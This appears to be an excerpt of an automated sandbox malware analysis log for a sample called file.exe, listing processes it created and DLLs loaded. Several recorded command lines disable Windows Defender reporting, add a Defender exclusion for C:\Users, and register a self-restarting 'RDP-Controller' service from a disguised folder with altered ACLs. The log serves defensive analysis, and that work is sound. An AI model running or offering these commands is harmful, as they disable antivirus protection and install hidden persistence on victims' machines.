Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k LocalService -s W32Time
Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\AppData\Local\Temp\lr75sq5smrngkif9fpn.exe "C:\Users\user~1\AppData\Local\Temp\lr75sq5smrngkif9fpn.exe"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoLogo -Command "Set-MpPreference -MAPSReporting 0"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoLogo -Command "Add-MpPreference -ExclusionPath 'C:\Users\'"
Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\AppData\Local\Temp\yhar2he6rpt6n0h1w6rh.exe "C:\Users\user~1\AppData\Local\Temp\yhar2he6rpt6n0h1w6rh.exe"
Source: C:\Users\user\AppData\Local\Temp\yhar2he6rpt6n0h1w6rh.exeProcess created: C:\Windows\System32\taskkill.exe taskkill.exe /F /FI "SERVICES eq RDP-Controller"
Source: C:\Windows\System32\taskkill.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\yhar2he6rpt6n0h1w6rh.exeProcess created: C:\Windows\System32\sc.exe sc.exe stop RDP-Controller
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\yhar2he6rpt6n0h1w6rh.exeProcess created: C:\Windows\System32\sc.exe sc.exe create RDP-Controller binpath= C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe type= own start= auto error= ignore
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\yhar2he6rpt6n0h1w6rh.exeProcess created: C:\Windows\System32\sc.exe sc.exe failure RDP-Controller reset= 1 actions= restart/10000
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\yhar2he6rpt6n0h1w6rh.exeProcess created: C:\Windows\System32\sc.exe sc.exe start RDP-Controller
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
Source: C:\Users\user\AppData\Local\Temp\yhar2he6rpt6n0h1w6rh.exeProcess created: C:\Windows\System32\icacls.exe icacls.exe C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\ /setowner *S-1-5-18
Source: C:\Windows\System32\icacls.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\yhar2he6rpt6n0h1w6rh.exeProcess created: C:\Windows\System32\icacls.exe icacls.exe C:\Users\Public /restore C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\95cRhCj4pPDP.acl
Source: C:\Windows\System32\icacls.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
Source: C:\Windows\System32\svchost.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable
Source: C:\Program Files\Windows Defender\MpCmdRun.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k WerSvcGroup
Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 440 -p 7988 -ip 7988
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7988 -s 1128
Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
Source: unknownProcess created: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
Source: C:\Windows\System32\svchost.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenableJump to behavior
Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\Desktop\file.exe C:\Users\user\Desktop\file.exeJump to behavior
Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /k "C:\Users\user~1\AppData\Local\Temp\sobuolvnbi3uboa4e.bat"Jump to behavior
Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\AppData\Local\Temp\lr75sq5smrngkif9fpn.exe "C:\Users\user~1\AppData\Local\Temp\lr75sq5smrngkif9fpn.exe" Jump to behavior
Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\AppData\Local\Temp\yhar2he6rpt6n0h1w6rh.exe "C:\Users\user~1\AppData\Local\Temp\yhar2he6rpt6n0h1w6rh.exe" Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoLogo -Command "Set-MpPreference -SubmitSamplesConsent NeverSend"Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoLogo -Command "Set-MpPreference -MAPSReporting 0"Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoLogo -Command "Add-MpPreference -ExclusionPath 'C:\Users\'"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\yhar2he6rpt6n0h1w6rh.exeProcess created: C:\Windows\System32\taskkill.exe taskkill.exe /F /FI "SERVICES eq RDP-Controller"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\yhar2he6rpt6n0h1w6rh.exeProcess created: C:\Windows\System32\sc.exe sc.exe stop RDP-ControllerJump to behavior
Source: C:\Users\user\AppData\Local\Temp\yhar2he6rpt6n0h1w6rh.exeProcess created: C:\Windows\System32\sc.exe sc.exe create RDP-Controller binpath= C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe type= own start= auto error= ignoreJump to behavior
Source: C:\Users\user\AppData\Local\Temp\yhar2he6rpt6n0h1w6rh.exeProcess created: C:\Windows\System32\sc.exe sc.exe failure RDP-Controller reset= 1 actions= restart/10000Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\yhar2he6rpt6n0h1w6rh.exeProcess created: C:\Windows\System32\sc.exe sc.exe start RDP-ControllerJump to behavior
Source: C:\Users\user\AppData\Local\Temp\yhar2he6rpt6n0h1w6rh.exeProcess created: C:\Windows\System32\icacls.exe icacls.exe C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\ /setowner *S-1-5-18Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\yhar2he6rpt6n0h1w6rh.exeProcess created: C:\Windows\System32\icacls.exe icacls.exe C:\Users\Public /restore C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\95cRhCj4pPDP.aclJump to behavior
Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 440 -p 7988 -ip 7988
Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7988 -s 1128
Source: C:\Windows\System32\WerFault.exeProcess created: unknown unknown
Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: moshost.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: mapsbtsvc.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: mosstorage.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ztrace_maps.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ztrace_maps.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: mapconfiguration.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: storsvc.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: devobj.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: fltlib.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: bcd.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: wer.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: cabinet.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: storageusage.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: aphostservice.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: networkhelper.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: userdataplatformhelperutil.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: syncutil.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: mccspal.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: vaultcli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dmcfgutils.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dmcmnutils.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dmxmlhelputils.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: inproclogger.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: windows.networking.connectivity.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: synccontroller.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: pimstore.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: aphostclient.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: accountaccessor.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dsclient.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: systemeventsbrokerclient.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: userdatalanguageutil.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: mccsengineshared.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: cemapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: userdatatypehelperutil.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: phoneutil.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: version.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: winmm.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: d3d9.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: dwmapi.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: wtsapi32.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: winsta.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: version.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: winmm.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: d3d9.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: dwmapi.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: wtsapi32.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: winsta.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: w32time.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: logoncli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: vmictimeprovider.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\lr75sq5smrngkif9fpn.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\lr75sq5smrngkif9fpn.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\yhar2he6rpt6n0h1w6rh.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: version.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: mpr.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: framedynos.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: dbghelp.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: srvcli.dll
